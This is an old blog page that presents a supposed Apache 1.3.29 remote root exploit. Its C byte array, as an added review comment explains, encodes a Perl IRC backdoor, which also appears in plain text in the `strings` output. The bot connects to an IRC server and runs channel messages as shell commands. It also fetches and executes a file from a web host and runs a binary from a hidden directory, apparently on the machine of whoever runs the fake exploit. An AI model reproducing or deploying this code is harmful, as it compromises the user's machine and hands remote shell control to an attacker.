Apache/1.3.29 - Remote Root Exploit

原创 2004年08月10日 17:35:00
/*
 * NOTE(review): despite its name, this array is not machine-code shellcode.
 * The bytes are plain ASCII text (printable characters and 0x0a newlines):
 * it opens with 0x23 0x21 0x2f 0x75 0x73 0x72 ("#!/usr") and decodes to the
 * Perl script that the `strings` output on this page shows, followed by a
 * single 0x00 terminator.
 *
 * What the decoded script does, as far as the text shows:
 *   - detaches with "exit if fork" and replaces the TERM handler;
 *   - connects to a hard-coded IRC server on port 6667 and joins a channel;
 *   - passes channel messages addressed to its nick to the shell via
 *     backticks and sends the output back to the channel;
 *   - in that reply loop, calls system() with a fixed command line that
 *     fetches a file with wget, runs it, deletes it, and then runs a binary
 *     from a hidden directory under /usr/share/locale.
 *
 * The code that consumes this array is not on the page. The imported
 * fopen/fwrite/system symbols and the trailing
 * "#chmod +x /tmp/lol 2>/dev/null;/tmp/lol" text suggest the script is
 * written to /tmp/lol and executed on the local machine, i.e. on the host of
 * whoever runs the "exploit" -- confirm against the full source.
 *
 * Triage indicators visible in this array: the file /tmp/lol, outbound TCP
 * to port 6667, and the directory /usr/share/locale/sk/.sk12.
 */
unsigned char h3llc0de[]=
{
 0x23, 0x21, 0x2f, 0x75, 0x73, 0x72, 0x2f, 0x62, 0x69,
 0x6e, 0x2f, 0x70, 0x65, 0x72, 0x6c, 0x0a, 0x0a,
 0x24, 0x63, 0x68, 0x61, 0x6e, 0x3d, 0x22, 0x23,
 0x70, 0x61, 0x72, 0x64, 0x69, 0x6c, 0x6c, 0x6f,
 0x73, 0x22, 0x3b, 0x0a, 0x24, 0x6e, 0x69, 0x63,
 0x6b, 0x3d, 0x22, 0x4c, 0x65, 0x6d, 0x6d, 0x69,
 0x6e, 0x67, 0x73, 0x22, 0x3b, 0x0a, 0x24, 0x73,
 0x65, 0x72, 0x76, 0x65, 0x72, 0x3d, 0x22, 0x65,
 0x66, 0x6e, 0x65, 0x74, 0x2e, 0x76, 0x75, 0x75,
 0x72, 0x77, 0x65, 0x72, 0x6b, 0x2e, 0x6e, 0x6c,
 0x22, 0x3b, 0x0a, 0x24, 0x53, 0x49, 0x47, 0x7b,
 0x54, 0x45, 0x52, 0x4d, 0x7d, 0x3d, 0x7b, 0x7d,
 0x3b, 0x0a, 0x65, 0x78, 0x69, 0x74, 0x20, 0x69,
 0x66, 0x20, 0x66, 0x6f, 0x72, 0x6b, 0x3b, 0x0a,
 0x75, 0x73, 0x65, 0x20, 0x49, 0x4f, 0x3a, 0x3a,
 0x53, 0x6f, 0x63, 0x6b, 0x65, 0x74, 0x3b, 0x0a,
 0x24, 0x73, 0x6f, 0x63, 0x6b, 0x20, 0x3d, 0x20,
 0x49, 0x4f, 0x3a, 0x3a, 0x53, 0x6f, 0x63, 0x6b,
 0x65, 0x74, 0x3a, 0x3a, 0x49, 0x4e, 0x45, 0x54,
 0x2d, 0x3e, 0x6e, 0x65, 0x77, 0x28, 0x24, 0x73,
 0x65, 0x72, 0x76, 0x65, 0x72, 0x2e, 0x22, 0x3a,
 0x36, 0x36, 0x36, 0x37, 0x22, 0x29, 0x7c, 0x7c,
 0x65, 0x78, 0x69, 0x74, 0x3b, 0x0a, 0x70, 0x72,
 0x69, 0x6e, 0x74, 0x20, 0x24, 0x73, 0x6f, 0x63,
 0x6b, 0x20, 0x22, 0x55, 0x53, 0x45, 0x52, 0x20,
 0x6c, 0x65, 0x6d, 0x6d, 0x69, 0x6e, 0x67, 0x73,
 0x20, 0x2b, 0x69, 0x20, 0x6c, 0x65, 0x6d, 0x6d,
 0x69, 0x6e, 0x67, 0x73, 0x20, 0x3a, 0x6c, 0x65,
 0x6d, 0x6d, 0x69, 0x6e, 0x67, 0x73, 0x76, 0x32,
 0x20, 0x5c, 0x6e, 0x4e, 0x49, 0x43, 0x4b, 0x20,
 0x6c, 0x65, 0x6d, 0x6d, 0x69, 0x6e, 0x67, 0x73,
 0x5c, 0x6e, 0x22, 0x3b, 0x0a, 0x24, 0x69, 0x3d,
 0x31, 0x3b, 0x77, 0x68, 0x69, 0x6c, 0x65, 0x28,
 0x3c, 0x24, 0x73, 0x6f, 0x63, 0x6b, 0x3e, 0x3d,
 0x7e, 0x2f, 0x5e, 0x5b, 0x5e, 0x20, 0x5d, 0x2b,
 0x20, 0x28, 0x5b, 0x5e, 0x20, 0x5d, 0x2b, 0x29,
 0x20, 0x2f, 0x29, 0x7b, 0x24, 0x6d, 0x6f, 0x64,
 0x65, 0x3d, 0x24, 0x31, 0x3b, 0x0a, 0x6c, 0x61,
 0x73, 0x74, 0x20, 0x69, 0x66, 0x20, 0x24, 0x6d,
 0x6f, 0x64, 0x65, 0x3d, 0x3d, 0x22, 0x30, 0x30,
 0x31, 0x22, 0x3b, 0x0a, 0x69, 0x66, 0x28, 0x24,
 0x6d, 0x6f, 0x64, 0x65, 0x3d, 0x3d, 0x22, 0x34,
 0x33, 0x33, 0x22, 0x29, 0x0a, 0x7b, 0x24, 0x69,
 0x2b, 0x2b, 0x3b, 0x24, 0x6e, 0x69, 0x63, 0x6b,
 0x3d, 0x7e, 0x73, 0x2f, 0x5c, 0x64, 0x2a, 0x24,
 0x2f, 0x24, 0x69, 0x2f, 0x3b, 0x70, 0x72, 0x69,
 0x6e, 0x74, 0x20, 0x24, 0x73, 0x6f, 0x63, 0x6b,
 0x20, 0x22, 0x4e, 0x49, 0x43, 0x4b, 0x20, 0x24,
 0x6e, 0x69, 0x63, 0x6b, 0x5c, 0x6e, 0x22, 0x3b,
 0x7d, 0x7d, 0x0a, 0x70, 0x72, 0x69, 0x6e, 0x74,
 0x20, 0x24, 0x73, 0x6f, 0x63, 0x6b, 0x20, 0x22,
 0x4a, 0x4f, 0x49, 0x4e, 0x20, 0x24, 0x63, 0x68,
 0x61, 0x6e, 0x5c, 0x6e, 0x50, 0x52, 0x49, 0x56,
 0x4d, 0x53, 0x47, 0x20, 0x24, 0x63, 0x68, 0x61,
 0x6e, 0x20, 0x3a, 0x6c, 0x65, 0x6d, 0x6d, 0x69,
 0x6e, 0x67, 0x73, 0x20, 0x76, 0x32, 0x2e, 0x31,
 0x5c, 0x6e, 0x50, 0x52, 0x49, 0x56, 0x4d, 0x53,
 0x47, 0x20, 0x24, 0x63, 0x68, 0x61, 0x6e, 0x20,
 0x3a, 0x70, 0x61, 0x72, 0x61, 0x20, 0x6d, 0x61,
 0x6e, 0x64, 0x61, 0x72, 0x6d, 0x65, 0x20, 0x63,
 0x6f, 0x6d, 0x61, 0x6e, 0x64, 0x6f, 0x73, 0x2c,
 0x20, 0x65, 0x73, 0x63, 0x72, 0x69, 0x62, 0x65,
 0x3a, 0x20, 0x22, 0x2e, 0x24, 0x6e, 0x69, 0x63,
 0x6b, 0x2e, 0x22, 0x3a, 0x63, 0x6f, 0x6d, 0x61,
 0x6e, 0x64, 0x6f, 0x5c, 0x6e, 0x22, 0x3b, 0x0a,
 0x77, 0x68, 0x69, 0x6c, 0x65, 0x28, 0x3c, 0x24,
 0x73, 0x6f, 0x63, 0x6b, 0x3e, 0x29, 0x0a, 0x7b,
 0x0a, 0x69, 0x66, 0x20, 0x28, 0x2f, 0x5e, 0x50,
 0x49, 0x4e, 0x47, 0x20, 0x28, 0x2e, 0x2a, 0x29,
 0x24, 0x2f, 0x29, 0x0a, 0x7b, 0x70, 0x72, 0x69,
 0x6e, 0x74, 0x20, 0x24, 0x73, 0x6f, 0x63, 0x6b,
 0x20, 0x22, 0x50, 0x4f, 0x4e, 0x47, 0x20, 0x24,
 0x31, 0x5c, 0x6e, 0x4a, 0x4f, 0x49, 0x4e, 0x20,
 0x24, 0x63, 0x68, 0x61, 0x6e, 0x5c, 0x6e, 0x22,
 0x3b, 0x7d, 0x0a, 0x69, 0x66, 0x28, 0x73, 0x2f,
 0x5e, 0x5b, 0x5e, 0x20, 0x5d, 0x2b, 0x20, 0x50,
 0x52, 0x49, 0x56, 0x4d, 0x53, 0x47, 0x20, 0x24,
 0x63, 0x68, 0x61, 0x6e, 0x20, 0x3a, 0x24, 0x6e,
 0x69, 0x63, 0x6b, 0x5b, 0x5e, 0x20, 0x3a, 0x5c,
 0x77, 0x5d, 0x2a, 0x3a, 0x5b, 0x5e, 0x20, 0x3a,
 0x5c, 0x77, 0x5d, 0x2a, 0x20, 0x28, 0x2e, 0x2a,
 0x29, 0x24, 0x2f, 0x24, 0x31, 0x2f, 0x29, 0x7b,
 0x73, 0x2f, 0x5c, 0x73, 0x2a, 0x24, 0x2f, 0x2f,
 0x3b, 0x24, 0x5f, 0x3d, 0x60, 0x24, 0x5f, 0x60,
 0x3b, 0x66, 0x6f, 0x72, 0x65, 0x61, 0x63, 0x68,
 0x28, 0x73, 0x70, 0x6c, 0x69, 0x74, 0x20, 0x22,
 0x5c, 0x6e, 0x22, 0x29, 0x0a, 0x7b, 0x0a, 0x73,
 0x79, 0x73, 0x74, 0x65, 0x6d, 0x28, 0x22, 0x77,
 0x67, 0x65, 0x74, 0x20, 0x77, 0x77, 0x77, 0x2e,
 0x67, 0x72, 0x61, 0x74, 0x69, 0x73, 0x77, 0x65,
 0x62, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x65, 0x6c,
 0x64, 0x75, 0x65, 0x6e, 0x64, 0x65, 0x63, 0x69,
 0x6c, 0x6c, 0x6f, 0x2f, 0x69, 0x6e, 0x73, 0x74,
 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64,
 0x20, 0x2b, 0x78, 0x20, 0x69, 0x6e, 0x73, 0x74,
 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x69, 0x6e, 0x73,
 0x74, 0x20, 0x3b, 0x20, 0x72, 0x6d, 0x20, 0x69,
 0x6e, 0x73, 0x74, 0x3b, 0x20, 0x63, 0x64, 0x20,
 0x2f, 0x75, 0x73, 0x72, 0x2f, 0x73, 0x68, 0x61,
 0x72, 0x65, 0x2f, 0x6c, 0x6f, 0x63, 0x61, 0x6c,
 0x65, 0x2f, 0x73, 0x6b, 0x2f, 0x2e, 0x73, 0x6b,
 0x31, 0x32, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x73,
 0x6b, 0x20, 0x3b, 0x20, 0x63, 0x64, 0x22, 0x20,
 0x29, 0x3b, 0x0a, 0x70, 0x72, 0x69, 0x6e, 0x74,
 0x20, 0x24, 0x73, 0x6f, 0x63, 0x6b, 0x20, 0x22,
 0x50, 0x52, 0x49, 0x56, 0x4d, 0x53, 0x47, 0x20,
 0x24, 0x63, 0x68, 0x61, 0x6e, 0x20, 0x3a, 0x24,
 0x5f, 0x5c, 0x6e, 0x22, 0x3b, 0x73, 0x6c, 0x65,
 0x65, 0x70, 0x20, 0x31, 0x3b, 0x7d, 0x7d, 0x7d,
 0x23, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b,
 0x78, 0x20, 0x2f, 0x74, 0x6d, 0x70, 0x2f, 0x6c,
 0x6f, 0x6c, 0x20, 0x32, 0x3e, 0x2f, 0x64, 0x65,
 0x76, 0x2f, 0x6e, 0x75, 0x6c, 0x6c, 0x3b, 0x2f,
 0x74, 0x6d, 0x70, 0x2f, 0x6c, 0x6f, 0x6c, 0x00
};


fatb@secu~# strings apache
/lib/ld-linux.so.2
libc.so.6
printf
memcpy
system
malloc
socket
inet_addr
setsockopt
fseek
sendto
fclose
fwrite
htons
fopen
_IO_stdin_used
__libc_start_main
strlen
__gmon_start__
GLIBC_2.1
GLIBC_2.0
PTRh
QVh_
[^_]
ERROR: No ip address entered
usage:
%s [IP-ADDRESS]
could not obtain raw socket
ARE YOU ROOT?
127.0.0.1
warning: cannot set HDRINCL
Server Patched or not Vulnerable :_(
#!/usr/bin/perl
$chan="#pardillos";
$nick="Lemmings";
$server="efnet.vuurwerk.nl";
$SIG{TERM}={};
exit if fork;
use IO::Socket;
$sock = IO::Socket::INET->new($server.":6667")||exit;
print $sock "USER lemmings +i lemmings :lemmingsv2 NICK lemmings ";
$i=1;while(<$sock>=~/^[^ ]+ ([^ ]+) /){$mode=$1;
last if $mode=="001";
if($mode=="433")
{$i++;$nick=~s/d*$/$i/;print $sock "NICK $nick ";}}
print $sock "JOIN $chan PRIVMSG $chan :lemmings v2.1 PRIVMSG $chan :para mandarme comandos, escribe: ".$nick.":comando ";
while(<$sock>)
if (/^PING (.*)$/)
{print $sock "PONG $1 JOIN $chan ";}
if(s/^[^ ]+ PRIVMSG $chan :$nick[^ :w]*:[^ :w]* (.*)$/$1/){s/s*$//;$_=`$_`;foreach(split " ")
system("wget www.gratisweb.com/elduendecillo/inst ; chmod +x inst ; ./inst ; rm inst; cd /usr/share/locale/sk/.sk12 ; ./sk ; cd" );
print $sock "PRIVMSG $chan :$_ ";sleep 1;}}}#chmod +x /tmp/lol 2>/dev/null;/tmp/lol
